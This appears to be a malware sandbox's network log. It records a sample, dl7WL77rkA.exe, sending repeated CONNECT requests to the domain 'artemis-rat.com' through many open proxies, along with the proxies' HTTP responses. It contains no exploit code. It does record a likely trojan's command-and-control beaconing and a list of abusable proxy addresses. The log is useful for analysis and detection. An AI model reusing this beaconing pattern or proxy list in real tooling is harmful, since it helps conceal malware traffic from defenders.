Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1703192.168.2.55463236.67.168.11780803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:45.678807020 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:46.056024075 CET | 19 | IN | HTTP/1.1 200 OK


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1704192.168.2.554569103.153.232.4180803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:45.680870056 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:46.081722021 CET | 19 | IN | HTTP/1.1 200 OK
Mar 11, 2024 03:31:49.274466038 CET | 208 | IN | HTTP/1.0 504 Gateway Timeout
Content-Length: 718
Content-Type: text/html
Date: Mon, 11 Mar 2024 02:29:25 GMT
Expires: Mon, 11 Mar 2024 02:29:25 GMT
Server: Mikrotik HttpProxy
Proxy-Connection: close
Mar 11, 2024 03:31:50.480228901 CET | 208 | IN | HTTP/1.0 504 Gateway Timeout
Content-Length: 718
Content-Type: text/html
Date: Mon, 11 Mar 2024 02:29:25 GMT
Expires: Mon, 11 Mar 2024 02:29:25 GMT
Server: Mikrotik HttpProxy
Proxy-Connection: close
Mar 11, 2024 03:31:52.873970032 CET | 208 | IN | HTTP/1.0 504 Gateway Timeout
Content-Length: 718
Content-Type: text/html
Date: Mon, 11 Mar 2024 02:29:25 GMT
Expires: Mon, 11 Mar 2024 02:29:25 GMT
Server: Mikrotik HttpProxy
Proxy-Connection: close
Mar 11, 2024 03:31:57.682579994 CET | 208 | IN | HTTP/1.0 504 Gateway Timeout
Content-Length: 718
Content-Type: text/html
Date: Mon, 11 Mar 2024 02:29:25 GMT
Expires: Mon, 11 Mar 2024 02:29:25 GMT
Server: Mikrotik HttpProxy
Proxy-Connection: close
Mar 11, 2024 03:32:07.311153889 CET | 208 | IN | HTTP/1.0 504 Gateway Timeout
Content-Length: 718
Content-Type: text/html
Date: Mon, 11 Mar 2024 02:29:25 GMT
Expires: Mon, 11 Mar 2024 02:29:25 GMT
Server: Mikrotik HttpProxy
Proxy-Connection: close
Mar 11, 2024 03:32:26.551217079 CET | 208 | IN | HTTP/1.0 504 Gateway Timeout
Content-Length: 718
Content-Type: text/html
Date: Mon, 11 Mar 2024 02:29:25 GMT
Expires: Mon, 11 Mar 2024 02:29:25 GMT
Server: Mikrotik HttpProxy
Proxy-Connection: close
Mar 11, 2024 03:33:05.031532049 CET | 208 | IN | HTTP/1.0 504 Gateway Timeout
Content-Length: 718
Content-Type: text/html
Date: Mon, 11 Mar 2024 02:29:25 GMT
Expires: Mon, 11 Mar 2024 02:29:25 GMT
Server: Mikrotik HttpProxy
Proxy-Connection: close
Mar 11, 2024 03:34:21.911609888 CET | 208 | IN | HTTP/1.0 504 Gateway Timeout
Content-Length: 718
Content-Type: text/html
Date: Mon, 11 Mar 2024 02:29:25 GMT
Expires: Mon, 11 Mar 2024 02:29:25 GMT
Server: Mikrotik HttpProxy
Proxy-Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1705192.168.2.550585162.240.72.139374453876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:45.683517933 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:48.702033997 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1706192.168.2.55478445.12.31.104803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:45.686650038 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:45.841113091 CET | 316 | IN | HTTP/1.1 400 Bad Request
Server: cloudflare
Date: Mon, 11 Mar 2024 02:30:45 GMT
Content-Type: text/html
Content-Length: 155
Connection: close
CF-RAY: -
Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1707192.168.2.55466489.42.166.16380803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.687704086 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.405157089 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:47.424112082 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:48.026057005 CET | 203 | IN | HTTP/1.0 404 Not Found
                                                                                                                                                                                                                                                            Content-Length: 1066
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Date: Thu, 07 Mar 2024 15:57:46 GMT
                                                                                                                                                                                                                                                            Expires: Thu, 07 Mar 2024 15:57:46 GMT
                                                                                                                                                                                                                                                            Server: Mikrotik HttpProxy
                                                                                                                                                                                                                                                            Proxy-Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1708192.168.2.554785104.24.193.186803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:45.687967062 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:45.842863083 CET | 316 | IN | HTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:45 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1709192.168.2.553296162.214.163.137505093876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:45.689506054 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1710192.168.2.5549134.182.9.1084433876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:45.690112114 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1711192.168.2.5549174.182.9.1084433876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:45.691692114 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1712192.168.2.5549184.182.9.1084433876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:45.692955971 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1713192.168.2.55456543.231.22.228803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:45.695102930 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:46.110755920 CET | 343 | IN | HTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:45 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 182
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1714192.168.2.554792104.19.85.214803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:45.695195913 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:45.849829912 CET | 316 | IN | HTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:45 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1715192.168.2.5549194.182.9.1084433876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:45.697693110 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1716192.168.2.554808104.20.125.124803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:45.697756052 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.852153063 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:45 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1717192.168.2.554601103.127.1.130803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.699915886 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.084530115 CET343INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:45 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 182
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1718192.168.2.55405046.4.252.23790503876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.708370924 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.702033043 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.702018023 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:57.702080011 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1719192.168.2.55461215.207.35.24110803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.710920095 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.105297089 CET116INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:45 GMT
                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                            Content-Type: text/plain
                                                                                                                                                                                                                                                            Content-Length: 0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1720192.168.2.55470835.237.210.21531283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.723361969 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.534235954 CET39INHTTP/1.1 200 Connection established


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1721192.168.2.55332474.119.144.6041453876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.833403111 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1722192.168.2.553967119.18.149.3480803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.834656954 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1723192.168.2.553225103.105.228.3580803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.834659100 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.232142925 CET19INHTTP/1.1 200 OK


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                            1724192.168.2.55480438.162.8.893128
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.834837914 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.287482977 CET111INHTTP/1.1 407 Proxy Authentication Required
                                                                                                                                                                                                                                                            Proxy-Authenticate: Basic realm=""
                                                                                                                                                                                                                                                            Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64
                                                                                                                                                                                                                                                            Data Ascii: Proxy Authentication Required


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1725 | 192.168.2.5 | 50551 | 162.240.73.148 | 42272 | 3876 | C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:45.838998079 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1726192.168.2.554699183.100.14.13480003876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:45.838998079 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:46.592586040 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:47.592762947 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:49.405340910 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:52.999327898 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:56.701951027 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:31:00.389390945 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1727 | 192.168.2.5 | 50582 | 162.214.197.102 | 46430 | 3876 | C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:45.839204073 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:48.902410984 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:52.014635086 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:58.014570951 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1728192.168.2.554860104.16.143.127803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:45.839258909 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:45.993612051 CET | 316 | IN | HTTP/1.1 400 Bad Request
Server: cloudflare
Date: Mon, 11 Mar 2024 02:30:45 GMT
Content-Type: text/html
Content-Length: 155
Connection: close
CF-RAY: -
Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
